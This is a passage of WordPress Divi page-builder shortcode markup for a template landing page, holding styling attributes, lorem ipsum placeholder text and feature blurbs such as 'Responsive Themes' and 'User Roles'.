custom_margin_last_edited=\"on|tablet\" animation_style=\"zoom\" animation_direction=\"left\" animation_intensity_zoom=\"10%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.17.6\" parallax=\"off\" parallax_method=\"on\"][et_pb_text _builder_version=\"3.17.6\" text_font=\"||||||||\" text_line_height=\"2em\" header_2_font=\"Poppins|600|||||||\" header_2_font_size=\"40px\" header_2_font_size_tablet=\"26px\" header_2_font_size_phone=\"20px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height=\"1.4em\" header_3_font=\"Poppins|600||on|||||\" header_3_text_color=\"#ff885a\" header_3_font_size=\"13px\" header_3_letter_spacing=\"2px\" header_3_line_height=\"1.8em\" max_width=\"700px\"]<h3>Elements</h3>\n<h2>Get Everything You Need With Just One Tool</h2>\n<p>Vivamus magna justo, lacinia eget consectetur sed, convallis at tellus. Sed porttitor lectus nibh. Curabitur non nulla sit amet nisl tempus convallis quis ac lectus. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Vivamus magna justo, lacinia eget consectetur sed, convallis at tellus. Nulla quis lorem ut libero malesuada feugiat. Curabitur non nulla sit amet nisl tempus convallis quis ac lectus. Curabitur non nulla sit amet nisl tempus convallis q</p>[/et_pb_text][et_pb_button button_text=\"View All Components\" _builder_version=\"3.17.6\" custom_button=\"on\" button_text_size=\"16px\" button_text_color=\"#ffffff\" button_bg_color=\"#091c4f\" button_border_color=\"rgba(0,0,0,0)\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Poppins|600|||||||\" button_use_icon=\"off\" box_shadow_style=\"preset1\" box_shadow_vertical=\"20px\" box_shadow_blur=\"71px\" box_shadow_spread=\"-14px\" box_shadow_color=\"#091c4f\" custom_padding=\"16px|32px|16px|32px|true|true\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_letter_spacing__hover=\"2px\" button_letter_spacing__hover_enabled=\"on\" button_border_width__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Features\" _builder_version=\"3.17.6\" custom_padding=\"8vw||8vw||true\" locked=\"off\"][et_pb_row _builder_version=\"3.17.6\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.17.6\" parallax=\"off\" parallax_method=\"on\"][et_pb_text _builder_version=\"3.17.6\" text_font=\"||||||||\" text_line_height=\"2em\" header_2_font=\"Poppins|600|||||||\" header_2_font_size=\"40px\" header_2_font_size_tablet=\"26px\" header_2_font_size_phone=\"20px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height=\"1.4em\" header_3_font=\"Poppins|600||on|||||\" header_3_text_color=\"#ff885a\" header_3_font_size=\"13px\" header_3_letter_spacing=\"2px\" header_3_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" locked=\"off\"]<h3>Features</h3>\n<h2>What You Get</h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"3.17.6\" use_custom_width__hover=\"off\" use_custom_width__hover_enabled=\"off\" custom_width_px__hover=\"1080px\" custom_width_px__hover_enabled=\"1080px\" use_custom_gutter__hover=\"off\" use_custom_gutter__hover_enabled=\"off\" gutter_width__hover=\"3\" gutter_width__hover_enabled=\"3\" parallax_1__hover=\"off\" parallax_1__hover_enabled=\"off\" parallax_2__hover=\"off\" parallax_2__hover_enabled=\"off\" parallax_3__hover=\"off\" parallax_3__hover_enabled=\"off\" parallax_4__hover=\"off\" parallax_4__hover_enabled=\"off\" parallax_5__hover=\"off\" parallax_5__hover_enabled=\"off\" parallax_6__hover=\"off\" parallax_6__hover_enabled=\"off\" parallax_method_1__hover=\"on\" parallax_method_1__hover_enabled=\"on\" parallax_method_2__hover=\"on\" parallax_method_2__hover_enabled=\"on\" parallax_method_3__hover=\"on\" parallax_method_3__hover_enabled=\"on\" parallax_method_4__hover=\"on\" parallax_method_4__hover_enabled=\"on\" parallax_method_5__hover=\"on\" parallax_method_5__hover_enabled=\"on\" parallax_method_6__hover=\"on\" parallax_method_6__hover_enabled=\"on\" use_background_color_gradient__hover=\"off\" use_background_color_gradient__hover_enabled=\"off\" background_color_gradient_start__hover=\"#2b87da\" background_color_gradient_start__hover_enabled=\"#2b87da\" background_color_gradient_end__hover=\"#29c4a9\" background_color_gradient_end__hover_enabled=\"#29c4a9\" background_color_gradient_type__hover=\"linear\" background_color_gradient_type__hover_enabled=\"linear\" background_color_gradient_direction__hover=\"180deg\" background_color_gradient_direction__hover_enabled=\"180deg\" background_color_gradient_direction_radial__hover=\"center\" background_color_gradient_direction_radial__hover_enabled=\"center\" background_color_gradient_start_position__hover=\"0%\" background_color_gradient_start_position__hover_enabled=\"0%\" background_color_gradient_end_position__hover=\"100%\" background_color_gradient_end_position__hover_enabled=\"100%\" background_color_gradient_overlays_image__hover=\"off\" background_color_gradient_overlays_image__hover_enabled=\"off\" parallax__hover=\"off\" parallax__hover_enabled=\"off\" parallax_method__hover=\"on\" parallax_method__hover_enabled=\"on\" background_size__hover=\"cover\" background_size__hover_enabled=\"cover\" background_position__hover=\"center\" background_position__hover_enabled=\"center\" background_repeat__hover=\"no-repeat\" background_repeat__hover_enabled=\"no-repeat\" background_blend__hover=\"normal\" background_blend__hover_enabled=\"normal\" allow_player_pause__hover=\"off\" allow_player_pause__hover_enabled=\"off\" background_video_pause_outside_viewport__hover=\"on\" background_video_pause_outside_viewport__hover_enabled=\"on\" make_fullwidth__hover=\"off\" make_fullwidth__hover_enabled=\"off\" width_unit__hover=\"on\" width_unit__hover_enabled=\"on\" custom_width_percent__hover=\"80%\" custom_width_percent__hover_enabled=\"80%\" make_equal__hover=\"off\" make_equal__hover_enabled=\"off\" border_radii__hover=\"on||||\" border_radii__hover_enabled=\"on||||\" box_shadow_style__hover=\"none\" box_shadow_style__hover_enabled=\"none\" box_shadow_color__hover=\"rgba(0,0,0,0.3)\" box_shadow_color__hover_enabled=\"rgba(0,0,0,0.3)\" filter_hue_rotate__hover=\"0deg\" filter_hue_rotate__hover_enabled=\"0deg\" filter_saturate__hover=\"100%\" filter_saturate__hover_enabled=\"100%\" filter_brightness__hover=\"100%\" filter_brightness__hover_enabled=\"100%\" filter_contrast__hover=\"100%\" filter_contrast__hover_enabled=\"100%\" filter_invert__hover=\"0%\" filter_invert__hover_enabled=\"0%\" filter_sepia__hover=\"0%\" filter_sepia__hover_enabled=\"0%\" filter_opacity__hover=\"100%\" filter_opacity__hover_enabled=\"100%\" filter_blur__hover=\"0px\" filter_blur__hover_enabled=\"0px\" mix_blend_mode__hover=\"normal\" mix_blend_mode__hover_enabled=\"normal\" animation_style__hover=\"none\" animation_style__hover_enabled=\"none\" animation_repeat__hover=\"once\" animation_repeat__hover_enabled=\"once\" animation_direction__hover=\"center\" animation_direction__hover_enabled=\"center\" animation_duration__hover=\"1000ms\" animation_duration__hover_enabled=\"1000ms\" animation_delay__hover=\"0ms\" animation_delay__hover_enabled=\"0ms\" animation_intensity_slide__hover=\"50%\" animation_intensity_slide__hover_enabled=\"50%\" animation_intensity_zoom__hover=\"50%\" animation_intensity_zoom__hover_enabled=\"50%\" animation_intensity_flip__hover=\"50%\" animation_intensity_flip__hover_enabled=\"50%\" animation_intensity_fold__hover=\"50%\" animation_intensity_fold__hover_enabled=\"50%\" animation_intensity_roll__hover=\"50%\" animation_intensity_roll__hover_enabled=\"50%\" animation_starting_opacity__hover=\"0%\" animation_starting_opacity__hover_enabled=\"0%\" animation_speed_curve__hover=\"ease-in-out\" animation_speed_curve__hover_enabled=\"ease-in-out\" hover_transition_duration__hover=\"300ms\" hover_transition_duration__hover_enabled=\"300ms\" hover_transition_delay__hover=\"0ms\" hover_transition_delay__hover_enabled=\"0ms\" hover_transition_speed_curve__hover=\"ease\" hover_transition_speed_curve__hover_enabled=\"ease\"][et_pb_column type=\"1_4\" _builder_version=\"3.17.6\" parallax=\"off\" parallax_method=\"on\"][et_pb_blurb title=\"Responsive Themes\" image=\"https://companyregistration.online/wp-content/uploads/2018/12/software-25.png\" content_max_width=\"1100px\" image_max_width_phone=\"80px\" image_max_width_last_edited=\"on|phone\" _builder_version=\"3.17.6\" header_font=\"Poppins|600|||||||\" header_font_size_phone=\"16px\" header_font_size_last_edited=\"on|desktop\" header_line_height=\"1.6em\" body_font=\"||||||||\" body_font_size=\"14px\" body_line_height=\"2em\" text_orientation=\"center\" animation_style=\"zoom\" animation_intensity_zoom=\"10%\" animation=\"off\" link_option_url=\"#\" locked=\"off\" child_filter_saturate__hover_enabled=\"on\" child_filter_saturate__hover=\"150%\" use_background_color_gradient__hover=\"off\" use_background_color_gradient__hover_enabled=\"off\" background_color_gradient_start__hover=\"#2b87da\" background_color_gradient_start__hover_enabled=\"#2b87da\" background_color_gradient_end__hover=\"#29c4a9\" background_color_gradient_end__hover_enabled=\"#29c4a9\" background_color_gradient_type__hover=\"linear\" background_color_gradient_type__hover_enabled=\"linear\" background_color_gradient_direction__hover=\"180deg\" background_color_gradient_direction__hover_enabled=\"180deg\" background_color_gradient_direction_radial__hover=\"center\" background_color_gradient_direction_radial__hover_enabled=\"center\" background_color_gradient_start_position__hover=\"0%\" background_color_gradient_start_position__hover_enabled=\"0%\" background_color_gradient_end_position__hover=\"100%\" background_color_gradient_end_position__hover_enabled=\"100%\" background_color_gradient_overlays_image__hover=\"off\" background_color_gradient_overlays_image__hover_enabled=\"off\" parallax__hover=\"off\" parallax__hover_enabled=\"off\" parallax_method__hover=\"on\" parallax_method__hover_enabled=\"on\" background_size__hover=\"cover\" background_size__hover_enabled=\"cover\" background_position__hover=\"center\" background_position__hover_enabled=\"center\" background_repeat__hover=\"no-repeat\" background_repeat__hover_enabled=\"no-repeat\" background_blend__hover=\"normal\" background_blend__hover_enabled=\"normal\" allow_player_pause__hover=\"off\" allow_player_pause__hover_enabled=\"off\" background_video_pause_outside_viewport__hover=\"on\" background_video_pause_outside_viewport__hover_enabled=\"on\" border_radii__hover=\"on||||\" border_radii__hover_enabled=\"on||||\" box_shadow_style__hover=\"none\" box_shadow_style__hover_enabled=\"none\" box_shadow_color__hover=\"rgba(0,0,0,0.3)\" box_shadow_color__hover_enabled=\"rgba(0,0,0,0.3)\"][/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.17.6\" parallax=\"off\" parallax_method=\"on\"][et_pb_blurb title=\"Full Customization\" image=\"https://companyregistration.online/wp-content/uploads/2018/12/software-24.png\" content_max_width=\"1100px\" image_max_width_phone=\"80px\" image_max_width_last_edited=\"on|phone\" _builder_version=\"3.17.6\" header_font=\"Poppins|600|||||||\" header_font_size_phone=\"16px\" header_font_size_last_edited=\"on|desktop\" header_line_height=\"1.6em\" body_font=\"||||||||\" body_font_size=\"14px\" body_line_height=\"2em\" text_orientation=\"center\" animation_style=\"zoom\" animation_intensity_zoom=\"10%\" animation=\"off\" link_option_url=\"#\" locked=\"off\" child_filter_saturate__hover=\"150%\" child_filter_saturate__hover_enabled=\"on\" use_background_color_gradient__hover=\"off\" use_background_color_gradient__hover_enabled=\"off\" background_color_gradient_start__hover=\"#2b87da\" background_color_gradient_start__hover_enabled=\"#2b87da\" background_color_gradient_end__hover=\"#29c4a9\" background_color_gradient_end__hover_enabled=\"#29c4a9\" background_color_gradient_type__hover=\"linear\" background_color_gradient_type__hover_enabled=\"linear\" background_color_gradient_direction__hover=\"180deg\" background_color_gradient_direction__hover_enabled=\"180deg\" background_color_gradient_direction_radial__hover=\"center\" background_color_gradient_direction_radial__hover_enabled=\"center\" background_color_gradient_start_position__hover=\"0%\" background_color_gradient_start_position__hover_enabled=\"0%\" background_color_gradient_end_position__hover=\"100%\" background_color_gradient_end_position__hover_enabled=\"100%\" background_color_gradient_overlays_image__hover=\"off\" background_color_gradient_overlays_image__hover_enabled=\"off\" parallax__hover=\"off\" parallax__hover_enabled=\"off\" parallax_method__hover=\"on\" parallax_method__hover_enabled=\"on\" background_size__hover=\"cover\" background_size__hover_enabled=\"cover\" background_position__hover=\"center\" background_position__hover_enabled=\"center\" background_repeat__hover=\"no-repeat\" background_repeat__hover_enabled=\"no-repeat\" background_blend__hover=\"normal\" background_blend__hover_enabled=\"normal\" allow_player_pause__hover=\"off\" allow_player_pause__hover_enabled=\"off\" background_video_pause_outside_viewport__hover=\"on\" background_video_pause_outside_viewport__hover_enabled=\"on\" border_radii__hover=\"on||||\" border_radii__hover_enabled=\"on||||\" box_shadow_style__hover=\"none\" box_shadow_style__hover_enabled=\"none\" box_shadow_color__hover=\"rgba(0,0,0,0.3)\" box_shadow_color__hover_enabled=\"rgba(0,0,0,0.3)\"][/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.17.6\" parallax=\"off\" parallax_method=\"on\"][et_pb_blurb title=\"World Class Support\" image=\"https://companyregistration.online/wp-content/uploads/2018/12/software-28.png\" content_max_width=\"1100px\" image_max_width_phone=\"80px\" image_max_width_last_edited=\"on|phone\" _builder_version=\"3.17.6\" header_font=\"Poppins|600|||||||\" header_font_size_phone=\"16px\" header_font_size_last_edited=\"on|desktop\" header_line_height=\"1.6em\" body_font=\"||||||||\" body_font_size=\"14px\" body_line_height=\"2em\" text_orientation=\"center\" animation_style=\"zoom\" animation_intensity_zoom=\"10%\" animation=\"off\" link_option_url=\"#\" locked=\"off\" child_filter_saturate__hover=\"150%\" child_filter_saturate__hover_enabled=\"on\" use_background_color_gradient__hover=\"off\" use_background_color_gradient__hover_enabled=\"off\" background_color_gradient_start__hover=\"#2b87da\" background_color_gradient_start__hover_enabled=\"#2b87da\" background_color_gradient_end__hover=\"#29c4a9\" background_color_gradient_end__hover_enabled=\"#29c4a9\" background_color_gradient_type__hover=\"linear\" background_color_gradient_type__hover_enabled=\"linear\" background_color_gradient_direction__hover=\"180deg\" background_color_gradient_direction__hover_enabled=\"180deg\" background_color_gradient_direction_radial__hover=\"center\" background_color_gradient_direction_radial__hover_enabled=\"center\" background_color_gradient_start_position__hover=\"0%\" background_color_gradient_start_position__hover_enabled=\"0%\" background_color_gradient_end_position__hover=\"100%\" background_color_gradient_end_position__hover_enabled=\"100%\" background_color_gradient_overlays_image__hover=\"off\" background_color_gradient_overlays_image__hover_enabled=\"off\" parallax__hover=\"off\" parallax__hover_enabled=\"off\" parallax_method__hover=\"on\" parallax_method__hover_enabled=\"on\" background_size__hover=\"cover\" background_size__hover_enabled=\"cover\" background_position__hover=\"center\" background_position__hover_enabled=\"center\" background_repeat__hover=\"no-repeat\" background_repeat__hover_enabled=\"no-repeat\" background_blend__hover=\"normal\" background_blend__hover_enabled=\"normal\" allow_player_pause__hover=\"off\" allow_player_pause__hover_enabled=\"off\" background_video_pause_outside_viewport__hover=\"on\" background_video_pause_outside_viewport__hover_enabled=\"on\" border_radii__hover=\"on||||\" border_radii__hover_enabled=\"on||||\" box_shadow_style__hover=\"none\" box_shadow_style__hover_enabled=\"none\" box_shadow_color__hover=\"rgba(0,0,0,0.3)\" box_shadow_color__hover_enabled=\"rgba(0,0,0,0.3)\"][/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.17.6\" parallax=\"off\" parallax_method=\"on\"][et_pb_blurb title=\"3rd Party Support\" image=\"https://companyregistration.online/wp-content/uploads/2018/12/software-29.png\" content_max_width=\"1100px\" _builder_version=\"3.17.6\" header_font=\"Poppins|600|||||||\" header_line_height=\"1.6em\" body_font=\"||||||||\" body_font_size=\"14px\" body_line_height=\"2em\" text_orientation=\"center\" animation_style=\"zoom\" animation_intensity_zoom=\"10%\" animation=\"off\" link_option_url=\"#\" locked=\"off\" child_filter_saturate__hover=\"150%\" child_filter_saturate__hover_enabled=\"on\" use_background_color_gradient__hover=\"off\" use_background_color_gradient__hover_enabled=\"off\" background_color_gradient_start__hover=\"#2b87da\" background_color_gradient_start__hover_enabled=\"#2b87da\" background_color_gradient_end__hover=\"#29c4a9\" background_color_gradient_end__hover_enabled=\"#29c4a9\" background_color_gradient_type__hover=\"linear\" background_color_gradient_type__hover_enabled=\"linear\" background_color_gradient_direction__hover=\"180deg\" background_color_gradient_direction__hover_enabled=\"180deg\" background_color_gradient_direction_radial__hover=\"center\" background_color_gradient_direction_radial__hover_enabled=\"center\" background_color_gradient_start_position__hover=\"0%\" background_color_gradient_start_position__hover_enabled=\"0%\" background_color_gradient_end_position__hover=\"100%\" background_color_gradient_end_position__hover_enabled=\"100%\" background_color_gradient_overlays_image__hover=\"off\" background_color_gradient_overlays_image__hover_enabled=\"off\" parallax__hover=\"off\" parallax__hover_enabled=\"off\" parallax_method__hover=\"on\" parallax_method__hover_enabled=\"on\" background_size__hover=\"cover\" background_size__hover_enabled=\"cover\" background_position__hover=\"center\" background_position__hover_enabled=\"center\" background_repeat__hover=\"no-repeat\" background_repeat__hover_enabled=\"no-repeat\" background_blend__hover=\"normal\" background_blend__hover_enabled=\"normal\" allow_player_pause__hover=\"off\" allow_player_pause__hover_enabled=\"off\" background_video_pause_outside_viewport__hover=\"on\" background_video_pause_outside_viewport__hover_enabled=\"on\" border_radii__hover=\"on||||\" border_radii__hover_enabled=\"on||||\" box_shadow_style__hover=\"none\" box_shadow_style__hover_enabled=\"none\" box_shadow_color__hover=\"rgba(0,0,0,0.3)\" box_shadow_color__hover_enabled=\"rgba(0,0,0,0.3)\"][/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"3.17.6\" use_custom_width__hover=\"off\" use_custom_width__hover_enabled=\"off\" custom_width_px__hover=\"1080px\" custom_width_px__hover_enabled=\"1080px\" use_custom_gutter__hover=\"off\" use_custom_gutter__hover_enabled=\"off\" gutter_width__hover=\"3\" gutter_width__hover_enabled=\"3\" parallax_1__hover=\"off\" parallax_1__hover_enabled=\"off\" parallax_2__hover=\"off\" parallax_2__hover_enabled=\"off\" parallax_3__hover=\"off\" parallax_3__hover_enabled=\"off\" parallax_4__hover=\"off\" parallax_4__hover_enabled=\"off\" parallax_5__hover=\"off\" parallax_5__hover_enabled=\"off\" parallax_6__hover=\"off\" parallax_6__hover_enabled=\"off\" parallax_method_1__hover=\"on\" parallax_method_1__hover_enabled=\"on\" parallax_method_2__hover=\"on\" parallax_method_2__hover_enabled=\"on\" parallax_method_3__hover=\"on\" parallax_method_3__hover_enabled=\"on\" parallax_method_4__hover=\"on\" parallax_method_4__hover_enabled=\"on\" parallax_method_5__hover=\"on\" parallax_method_5__hover_enabled=\"on\" parallax_method_6__hover=\"on\" parallax_method_6__hover_enabled=\"on\" use_background_color_gradient__hover=\"off\" use_background_color_gradient__hover_enabled=\"off\" background_color_gradient_start__hover=\"#2b87da\" background_color_gradient_start__hover_enabled=\"#2b87da\" background_color_gradient_end__hover=\"#29c4a9\" background_color_gradient_end__hover_enabled=\"#29c4a9\" background_color_gradient_type__hover=\"linear\" background_color_gradient_type__hover_enabled=\"linear\" background_color_gradient_direction__hover=\"180deg\" background_color_gradient_direction__hover_enabled=\"180deg\" background_color_gradient_direction_radial__hover=\"center\" background_color_gradient_direction_radial__hover_enabled=\"center\" background_color_gradient_start_position__hover=\"0%\" background_color_gradient_start_position__hover_enabled=\"0%\" background_color_gradient_end_position__hover=\"100%\" background_color_gradient_end_position__hover_enabled=\"100%\" background_color_gradient_overlays_image__hover=\"off\" background_color_gradient_overlays_image__hover_enabled=\"off\" parallax__hover=\"off\" parallax__hover_enabled=\"off\" parallax_method__hover=\"on\" parallax_method__hover_enabled=\"on\" background_size__hover=\"cover\" background_size__hover_enabled=\"cover\" background_position__hover=\"center\" background_position__hover_enabled=\"center\" background_repeat__hover=\"no-repeat\" background_repeat__hover_enabled=\"no-repeat\" background_blend__hover=\"normal\" background_blend__hover_enabled=\"normal\" allow_player_pause__hover=\"off\" allow_player_pause__hover_enabled=\"off\" background_video_pause_outside_viewport__hover=\"on\" background_video_pause_outside_viewport__hover_enabled=\"on\" make_fullwidth__hover=\"off\" make_fullwidth__hover_enabled=\"off\" width_unit__hover=\"on\" width_unit__hover_enabled=\"on\" custom_width_percent__hover=\"80%\" custom_width_percent__hover_enabled=\"80%\" make_equal__hover=\"off\" make_equal__hover_enabled=\"off\" border_radii__hover=\"on||||\" border_radii__hover_enabled=\"on||||\" box_shadow_style__hover=\"none\" box_shadow_style__hover_enabled=\"none\" box_shadow_color__hover=\"rgba(0,0,0,0.3)\" box_shadow_color__hover_enabled=\"rgba(0,0,0,0.3)\" filter_hue_rotate__hover=\"0deg\" filter_hue_rotate__hover_enabled=\"0deg\" filter_saturate__hover=\"100%\" filter_saturate__hover_enabled=\"100%\" filter_brightness__hover=\"100%\" filter_brightness__hover_enabled=\"100%\" filter_contrast__hover=\"100%\" filter_contrast__hover_enabled=\"100%\" filter_invert__hover=\"0%\" filter_invert__hover_enabled=\"0%\" filter_sepia__hover=\"0%\" filter_sepia__hover_enabled=\"0%\" filter_opacity__hover=\"100%\" filter_opacity__hover_enabled=\"100%\" filter_blur__hover=\"0px\" filter_blur__hover_enabled=\"0px\" mix_blend_mode__hover=\"normal\" mix_blend_mode__hover_enabled=\"normal\" animation_style__hover=\"none\" animation_style__hover_enabled=\"none\" animation_repeat__hover=\"once\" animation_repeat__hover_enabled=\"once\" animation_direction__hover=\"center\" animation_direction__hover_enabled=\"center\" animation_duration__hover=\"1000ms\" animation_duration__hover_enabled=\"1000ms\" animation_delay__hover=\"0ms\" animation_delay__hover_enabled=\"0ms\" animation_intensity_slide__hover=\"50%\" animation_intensity_slide__hover_enabled=\"50%\" animation_intensity_zoom__hover=\"50%\" animation_intensity_zoom__hover_enabled=\"50%\" animation_intensity_flip__hover=\"50%\" animation_intensity_flip__hover_enabled=\"50%\" animation_intensity_fold__hover=\"50%\" animation_intensity_fold__hover_enabled=\"50%\" animation_intensity_roll__hover=\"50%\" animation_intensity_roll__hover_enabled=\"50%\" animation_starting_opacity__hover=\"0%\" animation_starting_opacity__hover_enabled=\"0%\" animation_speed_curve__hover=\"ease-in-out\" animation_speed_curve__hover_enabled=\"ease-in-out\" hover_transition_duration__hover=\"300ms\" hover_transition_duration__hover_enabled=\"300ms\" hover_transition_delay__hover=\"0ms\" hover_transition_delay__hover_enabled=\"0ms\" hover_transition_speed_curve__hover=\"ease\" hover_transition_speed_curve__hover_enabled=\"ease\"][et_pb_column type=\"1_4\" _builder_version=\"3.17.6\" parallax=\"off\" parallax_method=\"on\"][et_pb_blurb title=\"Updates & Fixes\" image=\"https://companyregistration.online/wp-content/uploads/2018/12/software-30.png\" content_max_width=\"1100px\" image_max_width_phone=\"80px\" image_max_width_last_edited=\"on|phone\" _builder_version=\"3.17.6\" header_font=\"Poppins|600|||||||\" header_font_size_phone=\"16px\" header_font_size_last_edited=\"on|desktop\" header_line_height=\"1.6em\" body_font=\"||||||||\" body_font_size=\"14px\" body_line_height=\"2em\" text_orientation=\"center\" animation_style=\"zoom\" animation_intensity_zoom=\"10%\" animation=\"off\" link_option_url=\"#\" locked=\"off\" child_filter_saturate__hover_enabled=\"on\" child_filter_saturate__hover=\"150%\" use_background_color_gradient__hover=\"off\" use_background_color_gradient__hover_enabled=\"off\" background_color_gradient_start__hover=\"#2b87da\" background_color_gradient_start__hover_enabled=\"#2b87da\" background_color_gradient_end__hover=\"#29c4a9\" background_color_gradient_end__hover_enabled=\"#29c4a9\" background_color_gradient_type__hover=\"linear\" background_color_gradient_type__hover_enabled=\"linear\" background_color_gradient_direction__hover=\"180deg\" background_color_gradient_direction__hover_enabled=\"180deg\" background_color_gradient_direction_radial__hover=\"center\" background_color_gradient_direction_radial__hover_enabled=\"center\" background_color_gradient_start_position__hover=\"0%\" background_color_gradient_start_position__hover_enabled=\"0%\" background_color_gradient_end_position__hover=\"100%\" background_color_gradient_end_position__hover_enabled=\"100%\" background_color_gradient_overlays_image__hover=\"off\" background_color_gradient_overlays_image__hover_enabled=\"off\" parallax__hover=\"off\" parallax__hover_enabled=\"off\" parallax_method__hover=\"on\" parallax_method__hover_enabled=\"on\" background_size__hover=\"cover\" background_size__hover_enabled=\"cover\" background_position__hover=\"center\" background_position__hover_enabled=\"center\" background_repeat__hover=\"no-repeat\" background_repeat__hover_enabled=\"no-repeat\" background_blend__hover=\"normal\" background_blend__hover_enabled=\"normal\" allow_player_pause__hover=\"off\" allow_player_pause__hover_enabled=\"off\" background_video_pause_outside_viewport__hover=\"on\" background_video_pause_outside_viewport__hover_enabled=\"on\" border_radii__hover=\"on||||\" border_radii__hover_enabled=\"on||||\" box_shadow_style__hover=\"none\" box_shadow_style__hover_enabled=\"none\" box_shadow_color__hover=\"rgba(0,0,0,0.3)\" box_shadow_color__hover_enabled=\"rgba(0,0,0,0.3)\"][/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.17.6\" parallax=\"off\" parallax_method=\"on\"][et_pb_blurb title=\"User Roles\" image=\"https://companyregistration.online/wp-content/uploads/2018/12/software-26.png\" content_max_width=\"1100px\" image_max_width_phone=\"80px\" image_max_width_last_edited=\"on|phone\" _builder_version=\"3.17.6\" header_font=\"Poppins|600|||||||\" header_font_size_phone=\"16px\" header_font_size_last_edited=\"on|desktop\" header_line_height=\"1.6em\" body_font=\"||||||||\" body_font_size=\"14px\" body_line_height=\"2em\" text_orientation=\"center\" animation_style=\"zoom\" animation_intensity_zoom=\"10%\" animation=\"off\" link_option_url=\"#\" locked=\"off\" child_filter_saturate__hover=\"150%\" child_filter_saturate__hover_enabled=\"on\" use_background_color_gradient__hover=\"off\" use_background_color_gradient__hover_enabled=\"off\" background_color_gradient_start__hover=\"#2b87da\" background_color_gradient_start__hover_enabled=\"#2b87da\" background_color_gradient_end__hover=\"#29c4a9\" background_color_gradient_end__hover_enabled=\"#29c4a9\" background_color_gradient_type__hover=\"linear\" background_color_gradient_type__hover_enabled=\"linear\" background_color_gradient_direction__hover=\"180deg\" background_color_gradient_direction__hover_enabled=\"180deg\" background_color_gradient_direction_radial__hover=\"center\" background_color_gradient_direction_radial__hover_enabled=\"center\" background_color_gradient_start_position__hover=\"0%\" background_color_gradient_start_position__hover_enabled=\"0%\" background_color_gradient_end_position__hover=\"100%\" background_color_gradient_end_position__hover_enabled=\"100%\" background_color_gradient_overlays_image__hover=\"off\" background_color_gradient_overlays_image__hover_enabled=\"off\" parallax__hover=\"off\" parallax__hover_enabled=\"off\" parallax_method__hover=\"on\" parallax_method__hover_enabled=\"on\" background_size__hover=\"cover\" background_size__hover_enabled=\"cover\" background_position__hover=\"center\" background_position__hover_enabled=\"center\" background_repeat__hover=\"no-repeat\" background_repeat__hover_enabled=\"no-repeat\" background_blend__hover=\"normal\" background_blend__hover_enabled=\"normal\" allow_player_pause__hover=\"off\" allow_player_pause__hover_enabled=\"off\" background_video_pause_outside_viewport__hover=\"on\" background_video_pause_outside_viewport__hover_enabled=\"on\" border_radii__hover=\"on||||\" border_radii__hover_enabled=\"on||||\" box_shadow_style__hover=\"none\" box_shadow_style__hover_enabled=\"none\" box_shadow_color__hover=\"rgba(0,0,0,0.3)\" box_shadow_color__hover_enabled=\"rgba(0,0,0,0.3)\"][/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.17.6\" parallax=\"off\" parallax_method=\"on\"][et_pb_blurb title=\"Robust Documentation\" image=\"https://companyregistration.online/wp-content/uploads/2018/12/software-31.png\" content_max_width=\"1100px\" image_max_width_phone=\"80px\" image_max_width_last_edited=\"on|phone\" _builder_version=\"3.17.6\" header_font=\"Poppins|600|||||||\" header_font_size_phone=\"16px\" header_font_size_last_edited=\"on|desktop\" header_line_height=\"1.6em\" body_font=\"||||||||\" body_font_size=\"14px\" body_line_height=\"2em\" text_orientation=\"center\" animation_style=\"zoom\" animation_intensity_zoom=\"10%\" animation=\"off\" link_option_url=\"#\" locked=\"off\" child_filter_saturate__hover=\"150%\" child_filter_saturate__hover_enabled=\"on\" use_background_color_gradient__hover=\"off\" use_background_color_gradient__hover_enabled=\"off\" background_color_gradient_start__hover=\"#2b87da\" background_color_gradient_start__hover_enabled=\"#2b87da\" background_color_gradient_end__hover=\"#29c4a9\" background_color_gradient_end__hover_enabled=\"#29c4a9\" background_color_gradient_type__hover=\"linear\" background_color_gradient_type__hover_enabled=\"linear\" background_color_gradient_direction__hover=\"180deg\" background_color_gradient_direction__hover_enabled=\"180deg\" background_color_gradient_direction_radial__hover=\"center\" background_color_gradient_direction_radial__hover_enabled=\"center\" background_color_gradient_start_position__hover=\"0%\" background_color_gradient_start_position__hover_enabled=\"0%\" background_color_gradient_end_position__hover=\"100%\" background_color_gradient_end_position__hover_enabled=\"100%\" background_color_gradient_overlays_image__hover=\"off\" background_color_gradient_overlays_image__hover_enabled=\"off\" parallax__hover=\"off\" parallax__hover_enabled=\"off\" parallax_method__hover=\"on\" parallax_method__hover_enabled=\"on\" background_size__hover=\"cover\" background_size__hover_enabled=\"cover\" background_position__hover=\"center\" background_position__hover_enabled=\"center\" background_repeat__hover=\"no-repeat\" background_repeat__hover_enabled=\"no-repeat\" background_blend__hover=\"normal\" background_blend__hover_enabled=\"normal\" allow_player_pause__hover=\"off\" allow_player_pause__hover_enabled=\"off\" background_video_pause_outside_viewport__hover=\"on\" background_video_pause_outside_viewport__hover_enabled=\"on\" border_radii__hover=\"on||||\" border_radii__hover_enabled=\"on||||\" box_shadow_style__hover=\"none\" box_shadow_style__hover_enabled=\"none\" box_shadow_color__hover=\"rgba(0,0,0,0.3)\" box_shadow_color__hover_enabled=\"rgba(0,0,0,0.3)\"][/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.17.6\" parallax=\"off\" 